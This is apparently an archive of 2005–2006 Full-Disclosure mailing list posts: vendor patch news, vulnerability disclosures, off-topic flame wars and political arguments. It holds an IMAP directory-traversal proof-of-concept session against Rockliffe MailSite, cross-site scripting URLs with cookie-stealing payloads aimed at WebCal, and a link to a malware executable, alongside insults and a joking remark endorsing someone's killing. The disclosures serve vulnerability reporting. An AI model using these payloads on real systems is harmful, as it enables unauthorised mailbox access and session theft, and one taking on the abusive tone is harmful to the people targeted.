I can confirm the patch appears on Windows Update for my win2k SP4 machine. -sb On 1/5/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Looks as if MS is issuing a fix out of band for the WMF issue. Should be available at 5:00 PM EST today. Title: Microsoft Security Response Center Bulletin Notification Issued: January 05, 2006 Summary === Important Information for Thursday 5 January 2006 Microsoft announced that it would release a security update to help protect customers from exploitations of a vulnerability in the Windows Meta File (WMF) area of code in the Windows operating system on Tuesday, January 2, 2006, in response to malicious and criminal attacks on computer users that were discovered last week. Microsoft will release the update today on Thursday, January 5, 2006, earlier than planned. Microsoft originally planned to release the update on Tuesday, January 10, 2006 as part of its regular monthly release of security bulletins, once testing for quality and application compatibility was complete. However, testing has been completed earlier than anticipated and the update is ready for release. In addition, Microsoft is releasing the update early in response to strong customer sentiment that the release should be made available as soon as possible. Microsoft's monitoring of attack data continues to indicate that the attacks are limited and are being mitigated both by Microsoft's efforts to shut down malicious Web sites and with up-to-date signatures form anti-virus companies. The security update will be available at 2:00 pm PT as MS06-001. Enterprise customers who are using Windows Server Update Services will receive the update automatically. In additional the update is supported Microsoft Baseline Security Analyzer 2.0, Systems Management Server, and Software Update Services. Enterprise customers can also manually download the update from the Download Center. Microsoft will hold a special Web cast on Friday, January 6, 2006, to provide technical details on the MS06-001 and to answer questions. Registration details will be available at http://www.microsoft.com/technet/security/default.mspx. Microsoft will also be releasing additional security updates on Tuesday, January 10, 2006 as part of its regularly scheduled release of security updates. What is this alert? As part of the monthly security bulletin release cycle, Microsoft provides advance notification to our customers on the number of new security updates being released, the products affected, the aggregate maximum severity and information about detection tools relevant to the update. This is intended to help our customers plan for the deployment of these security updates more effectively. In addition, to help customers prioritize monthly security updates with any non-security updates released on Microsoft Update, Windows Update, Windows Server Update Services and Software Update Services on the same day as the monthly security bulletins, we also provide: . Information about the release of updated versions of the Microsoft Windows Malicious Software Removal Tool. . Information about the release of NON-SECURITY, High Priority updates on Microsoft Update (MU), Windows Update (WU), Windows Server Update Services (WSUS) and Software Update Services (SUS). Note that this information will pertain ONLY to updates on Windows Update and only about High Priority, non-security updates being released on the same day as security updates. Information will NOT be provided about Non-security updates released on other days. On 10 January 2006 Microsoft is planning to release: Security Updates . 1 Microsoft Security Bulletin affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA). . 1 Microsoft Security Bulletin affecting Microsoft Exchange and Microsoft Office. The highest Maximum Severity rating for these is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA). Microsoft Windows Malicious Software Removal Tool . Microsoft is planning to release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS). Non-security High Priority updates on MU, WU, WSUS and SUS . Microsoft is planning to release 1 NON-SECURITY High-Priority Update on Windows Update
Re: [Full-disclosure] Rockliffe Directory Transversal Vulnerability
Seeing as most IMAP servers allow you to use ../../ with SELECT, etc.. (think uw-imapd for example) I think I would categorize this as more of a permissions problem. -sb On 1/4/06, Josh Zlatin [EMAIL PROTECTED] wrote: Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability. Product: Rockliffe Mailsite http://www.rockliffe.com Version: Confirmed on Mailsite 6.1.22.1 Author: Josh Zlatin-Amishav Date: January 4, 2006 Background: Rockliffe MailSite secure email server software and MailSite MP secure email gateways provide email server solutions and gateway email protection for businesses and service providers. Rockliffe has more than 3,000 customers hosting more than 15 million mailboxes worldwide. Issue: In working with researchers at Tenable Network Security, I have come across a directory transversal flaw in the IMAP server. It is possible for an authenticated user to access any user's inbox via a RENAME command. PoC: [EMAIL PROTECTED]:~$ telnet 10.0.0.5 143 Trying 10.0.0.5... Connected to 10.0.0.5. Escape character is '^]'. * OK MailSite IMAP4 Server 6.1.22.0 ready a1 login joe pass a1 OK LOGIN completed a2 rename ../../josh/INBOX gotcha a2 OK RENAME folder ../../josh/INBOX renamed to gotcha a3 select gotcha * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) * 0 EXISTS * 0 RECENT * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] * OK [UNSEEN 0] * OK [UIDVALIDITY 514563061] UIDs are valid a3 OK [READ-WRITE] opened gotcha user joe can now access the contents of user josh's INBOX directory. Vendor notified: January 3, 2006 06:12AM Vendor Response: Contact your sales rep about purchasing Mailsite 7.0.3.1 Solution: Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes the directory transversal problem. Either upgrade to version 6.1.22 and install the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of Mailsite. The hotfix can be obtained at: ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe References: http://www.rockliffe.com References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]
Well if you look at the fact there is no title on titlebar and the fact the active tab is Untitled, I'd hazard to guess its something he manually entered into the address bar, and so we don't even know if this is exploitable by clicking a link or whatnot. Not exactly sure why this was posted if no details are provided. Anything else for us Sumit? -sb On 1/2/06, Lise Moorveld [EMAIL PROTECTED] wrote: Dear Sumit, Could you tell me how you exploited this buffer overflow issue in Firefox so I can try and reproduce it? I notice a lot of A's in your address bar but I'm not sure whether that's it and if so, how many A's are used. Regards, Lise --- Sumit Siddharth [EMAIL PROTECTED] wrote: Hi, The Windows display manager crashes when a BOF is attempted on a mozilla firefox. This has different results on different windows machine. In Windows XP only the display manager crashes , whereas on a Windows 2000 server the BSOD(Blue screen of death )appears and the system hangs. I am using Firefox 1.0.6. I think that the bug is in the display driver and not with firefox. Kindly find a screen shot attached with this email. Thanks Sumit -- Sumit Siddharth Information Security Analyst NII Consulting Web: www.nii.co.in NII Security Advisories http://www.nii.co.in/resources/advisories.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Yahoo! DSL – Something to write home about. Just $16.99/mo. or less. dsl.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure][WAY OFF TOPIC] complaints aboutthegovernemntspying!
Personally I'm not opposed to the killing of J.A. if it will end this quietly ;-) -sb On 12/31/05, J.A. Terranson [EMAIL PROTECTED] wrote: On Fri, 30 Dec 2005, InfoSecBOFH wrote: You know what. Who gives a fuck about any of this. I am an American. We have the bombs, we have the money. We have the balls to use them. remainder of Redneck Toilet Speech elided So, remind us again, why is it that killing Americans such as yourself should be looked at as a bad thing? -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF 'The right of self defence is the first law of nature: in most governments it has been the study of rulers to confine this right within the narrowest limits possible. Wherever standing armies are kept up, and the right of the people to keep and bear arms is, under any colour or pretext whatsoever, prohibited, liberty, if not already annihilated, is on the brink of destruction.' St. George Tucker ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Spy Agency Mined Vast Data Trove
It's amazing nobody has brought up the fact that Bush was illegally monitoring domestic and international calls during a presidential election. He could have been listening to the Kerry camp's calls. Worse we'll never know because without a judge's approval there is no official paper trail. It's completely baffling that Clinton was almost impeached for lying about an affair, but Bush stole our civil rights, illegally monitored us, and will continue to do so forever since his perpetual war on terror technically will never end unless everyone who hates the United States is eliminated. What a fucking traitor, sb On 12/28/05, Rodrigo Barbosa [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I was going to reply to all that stuff you wrote, but since you are so intent of showing that you know nothing about how things work on other countries, I'll just reply to one statement, that seems to be the heart of the issue. On Wed, Dec 28, 2005 at 08:46:11AM -0600, Leif Ericksen wrote: Now is your traffic legit? Are you moving legal money around? Are you a drug dealer legal or otherwise? Are you a dealing with other items that might be illegal in the US and are trying to get them here via Canada? Guilty until proven innocent, is that what you mean ? []s - -- Rodrigo Barbosa [EMAIL PROTECTED] Quid quid Latine dictum sit, altum viditur Be excellent to each other ... - Bill Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD4DBQFDsqmEpdyWzQ5b5ckRAq8VAJdnzgbJxO2bQb396PNSkaSyeKrFAJ992y3v 8azmd2SGVicg1YiPaIo9Vw== =Zc4J -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Moreover Robert Lemos
So let me get this straight. SecurityFocus doesn't think you're worth their time and so they must not be hackers... I'd say I was confused but sadly I think I get it. -sb On 12/27/05, Joe Average [EMAIL PROTECTED] wrote: This mail was sent on behalf of the n3td3v group. It goes without saying that some online security jourlists can go for years with inserting a certain catchphrase into their articles and not realise whats going on. Aw, well, since the netdev group have fallen out with Securityfocus (Robert Lemos) C|Net (Joris Evers) who think they can report on hackers and never ve involved or hacked by their existance, then nows the time to wake up. (Both your sites are vulnerable from high jacking, cross site scripting, and other bad coding, thanks for your time. Yours Truely The international hackers you report about on your site all the time, n3td3v (Team of security professionals from around the world) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I never said Moreover Robert Lemos
What does Robert Lemos saying Moreover have anything to do with security? And what is your obsession with slandering and discrediting people who actually have jobs and accomplished more than copied and pasted e-mails like you anyways. Moreover, you are n3td3v. -sb On 12/27/05, Joe Average [EMAIL PROTECTED] wrote: I am not a Security Journalist who has said Moreover for the last 20 years, how dare you say such a thing! Securityfocus.com and News.com have such a good reputation for not saying Moreover Results 1 - 10 of about 29,100 for robert lemos moreover . (0.04 seconds) http://www.google.com/search?q=robert+lemos+moreover ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I never said Moreover Robert Lemos
So what? I don't care if the guy eats babies for breakfast, personal attacks have nothing to with security or any topic covered on this list. -sb On 12/28/05, InfoSecBOFH [EMAIL PROTECTED] wrote: In his defence. Lemos is kind of a fuckbag On 12/27/05, Stan Bubrouski [EMAIL PROTECTED] wrote: What does Robert Lemos saying Moreover have anything to do with security? And what is your obsession with slandering and discrediting people who actually have jobs and accomplished more than copied and pasted e-mails like you anyways. Moreover, you are n3td3v. -sb On 12/27/05, Joe Average [EMAIL PROTECTED] wrote: I am not a Security Journalist who has said Moreover for the last 20 years, how dare you say such a thing! Securityfocus.com and News.com have such a good reputation for not saying Moreover Results 1 - 10 of about 29,100 for robert lemos moreover . (0.04 seconds) http://www.google.com/search?q=robert+lemos+moreover ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Breaking LoJack for Laptops
Hehe I noticed that and didnt bother telling you ;-P-sbOn 12/25/05, Bob Hacker [EMAIL PROTECTED] wrote:sorry i misplaced your post with your reality, I replied simply with... Bob Hacker to Stan More options Dec 24 (1 day ago) Its outstanding, I was being sarcastic just out of context. Happy New Year List ! =) !Z I replied to stan not the list. Guess I should Have. On Sun, 25 Dec 2005 13:38:15 -0800 Bob Hacker [EMAIL PROTECTED] wrote:Let me clarify this this to you and others who don't understand the slightest about much.Allowing 192* to be called from is absurd. And its not that hardto whoisthe ip, contact the isp who now these days hand over informationto almost*anyone with a nice fancy letterhead from a lawyers office. Saying In case you didn't realize it, the 192.168 range is private. Gowhois yourself silly trying to find out. Better yet go ask aroundwho is 192.168.x.x for kicks.Dear MrISP bad person using this IP has stolen laptop that sold on ebay for 50bucks, please give us his address so we may take him to court andcharge himwith possession of stolen property, a misdemenor in most states.For your information you seem to know little about how things work. Go ask any provider for information with any kind of letterheadyou'd like. See what they will tell you. You seem to be stuck onstupid assuming a bonafide provider is going to budge simplybecause some letterhead. Without a court order you'd be wasting a piece of paper.Yes itslogical. But in theory I think the whole thing is like the MS keyvalidate,disable it in windows add-ons and move on. Its like that one timeatbandcamp when i was on a lan and didnt know my ip so i went to steve gibsonssite.Wow you are so 31337 to run over to Gibson's site. Case in point noneed to further clarify anything on my original post. Don't make anass out of yourself responding when you have one half of one half of a smidgen of a clue. Note. I am sure anyone who has a purchased a stolen laptop , it had apassword on it. So the OS was already installed. just my .02Instead of wasting time making yourself look more clueless you should take some time and actually run along and learn somethingproductive. The message had nothing to do with a stolen laptop, ithad to do with defeating its protection. Whether or not it had/hasa password is irrelevant. And your last comment made no sense so take your two cents and buy yourself a clue.-BEGIN PGP SIGNATURE-Note: This signature can be verified at https://www.hushtools.com/verifyVersion: Hush 2.4wkYEARECAAYFAkOvRFYACgkQo8cxM8/cskrwrwCfc5wIUtYDj1vt5e5A62IKSeNj8UEAn0t1uEQ6cJfU51iu24hKwzaZRQpi=gxB0-END PGP SIGNATURE-Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Seasons Beatings
tinyurl has already closed that account due to abuse FYI :) -sb On 12/17/05, Pieter de Boer [EMAIL PROTECTED] wrote: Morning Wood wrote: oh wow, fun toys for the holidays... http://tinyurl.com/9tz5g postcard.gif.exe A link to almost this same .exe has been spammed to me several times some weeks ago. There were a couple of bots in the Undernet-channels, but nothing really shocking. Suppose they're trying to get some more now ;) -- Pieter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] InfoSecBOFH and other trouble makers
I wonder if he's sending himself gmail invites...lol -sb On 12/15/05, sk / GroundZero [EMAIL PROTECTED] wrote: so pathetic, n3td0rk already has to invent imaginary people which are on his side. so its not always he against the FD list. oh well boy, you just proove once more how lame you are. look at his 31337 social engineering skills! has so awsome.. but hey just in case you really really arent n3td3v himself, let me speak with the words of your friend: you never have contributed anything security related to this list so you have no right to be on this list or something like that... your name is funny too Joe Average ..anyone knows John Doe ? :P - Original Message - From: Joe Average To: full-disclosure@lists.grok.org.uk Sent: Thursday, December 15, 2005 11:54 AM Subject: [Full-disclosure] InfoSecBOFH and other trouble makers please leave list unless you stop the abuse against netdev ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory: XSS in WebCal (v1.11-v3.04)
Author: Stan Bubrouski Date: December 16, 2005 Package: WebCal (by Michael Arndt; http://bulldog.tzo.org/webcal/webcal.html) Versions Affected: 1.11-3.04 (unknown 1.11) Severity: XSS allowing cookie theft, etc.. Description: This particular WebCal (there are in fact over a dozen separate webcal projects), suffers from cross-site scripting (XSS) vulnerabilities using almost any parameters sent to any of the included CGI (perl) scripts. Here are a couple examples using version 3.04: http://bulldog.tzo.org/perl/webcal.cgi?function=scriptalert(document.cookie)/scriptcal=public http://bulldog.tzo.org/perl/webcal.cgi?function=webyearcal=publicyear=scriptalert(document.cookie)/script http://bulldog.tzo.org/perl/webcal.cgi?function=webdaycal=publicdate=scriptalert(document.cookie)/script These examples however are just the tip of the iceburg, there are many many more. For example you can put full scripts in new calendar entries, as notes for entries, etc... there is no input validation. Googling for this particular WebCal shows thousands of sites still run it, and most of them are schools and colleges in the USA. What is scarier is that people are running this calendar on their main sites, where they host webmail and other session-cookie based webapps. Solution: WebCal development ceased in early 2003, meaning nobody is going to be updating it in all likelyhood. While it may be possible to patch all the XSS holes, a better alternative would be to find a newer, supported calendar program. There are plenty of perl, PHP, and JSP alternatives that should be considered. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut (out now on DVD)
On 12/11/05, n3td3v [EMAIL PROTECTED] wrote: This list is for people to disclose security information, not for random people to disrespect others who do disclose vulnerabilities. It THAT IS ALL YOU DO!!! You post some XSS vuln somewhere then criticize everyone else on the list while touting how awesome and l337 you are. If all you did was post vulnerabilities do you think people would start threads dedicated to your stupidity? was a personal attack, because you're trying to make fun of serious comments i've made. You've taken all of the quotes out of context, so they make little sense to anyone. The problem is you are a tool. You find a bug in Yahoo or Google then diss the other 7 billion people who haven't or haven't bothered. You then presume they are not as skilled as you then put them down in the most childish ways while crticizing them for doing the same in return. You then continue to start threads, spread misinformation about people and then tell them they're stupid. Suggestion: Turn off your computer and go back to watching Seasame Street on your PSP. -sb On 12/11/05, Steve Russell [EMAIL PROTECTED] wrote: It was not a personal attack - it was humour, the difference being you obviously cannot tell them apart. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Format String Vulnerabilities in Perl Programs
On 12/3/05, Michael J. Pomraning [EMAIL PROTECTED] wrote: SNIP For Perl projects, I'd also nominate syslog(), from the standard Sys::Syslog module, for special attention. It's common in *NIX environments regardless of programmers' backgrounds and is extremely likely to be called with untrusted data interpolated directly in the format string argument -- syslog(info, A user said $user_input), for example. This has been mentioned numerous times, including this week (?), nothing new. -sb Regards, Mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Clever crooks can foil wiretaps, security flaw in tap technology
While you make some valid points, lets not escalate this to another political discussion ;-) -sb On 11/30/05, Dude VanWinkle [EMAIL PROTECTED] wrote: On 11/30/05, Andy Lindeman [EMAIL PROTECTED] wrote: I think we're talking about legal wiretaps, e.g. a law enforcement agency with a court order. The problem is if you can easily fool the system, the evidence is possibly unreliable and/or tainted. However, even if you can temporarily fool the law enforcement agency in question, it's doubtful this would keep you out of trouble for long. If law enforcement is involved in a wiretap, that means they dont have enough evidence to convict you. Even if they do have enough evidence to convict you, they have yet to do so, or you wouldn't be on the phone. This means they are snooping on innocent civilians by providing circumstantial evidence to a judge (or, since the Provide Appropriate Tools Required to Intercept and Obstruct Terrorism act, they may not even need a warrant) Either way, this is a bad tangent to go off on. That was a great study done, and shouldn't be trivialized by my ramblings. Does anyone know of a C-Tone for GPS devices? ;-) -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Forwarding comments to FD
Man these threads are just a waste of space... cant you guys just settle this with a pissing contest or in an octogon of death? or better yet just kill eachother? I liked it much better when you all responded to separate threads and ignored eachothers existence. -sb On 11/19/05, Bernhard Mueller [EMAIL PROTECTED] wrote: n3td3v wr04t3: I have been a continued provider of raw intelligence to Yahoo... This probably explains why Yahoo has zero clue about security :) -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Websites vulnerabilities disclosure
On 10/6/05, Georgi Guninski [EMAIL PROTECTED] wrote: On Thu, Oct 06, 2005 at 09:09:32AM +0400, offtopic wrote: snip Which fird-party can't be user as coordinator, like CERT/CC? i recommend you don't use coordinators - they are f*ck*d parasites. think about what they will coordinate - probably selling your info. cert* sux. I really agree with this. When you're a researcher who puts the time in to discovering, exploiting, and sometimes fixing a vulnerability, you've done the work, why let them steal the credit? There are times when you find holes that you report to one of these services because you have no time or motivation to do the research yourself. But if you want the credit for what you've done or even feedback then writing up your own advisory or working on one with a vendor is a much better solution. After all, what do these services offer that you can't do yourself? Best Regards, sb -- where do you want bill gates to go today? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
LOL, and he didn't pt a subject on either message... On 8/9/05, KF (lists) [EMAIL PROTECTED] wrote: Maybe next I can enjoy a subject line? -KF SNIP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Wierd firefox symptom
Hey, I don't ordinarily send messages like this, but I find it kinda disturbing. I opened up firefox today (v1.0.2 I know its old but I haven't used this PC in a while), and typed: www.espn.com into the address bar only to find myself at: http://www.megago.com/l/? I checked the address bar history and it indeed showed that I had typed http://www.espn.com So I tried again. I made sure I typed www.espn.com and once again ended up at http://www.megago.com/l/? The third time was a charm. ESPN actually loaded. Checked firefox directories for any rogue extensions or modified files and nothing had been modified since I updated the User Agent Switcher extension on 5/16/05. I ran NAV and MS Anti-Spyware and nothing was found. Which makes sense since I only use Mozilla and have A LOT of sites blocked using adblock extension. So I'm kind of at a loss. I can't reproduce it atm but I'm just wondering has anyone else seen this before and could it just be a firefox bug? -sb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
Paul Schmehl wrote: --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan Bubrouski [EMAIL PROTECTED] wrote: Could we can the nazi rhetoric in messages on this list? Or can we just complain until the list loses its hosting? That makes a great deal of sense. One poster sends stuff you find offensive, so you want to shut down the entire list? hehe i just meant before someone else who found it offensive did something more drastic then whine on the list about it. Clearly shutting down the list would not be in my interest. -sb Yeah, makes perfect sense. Next you'll tell us you're going to take your ball and go home. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
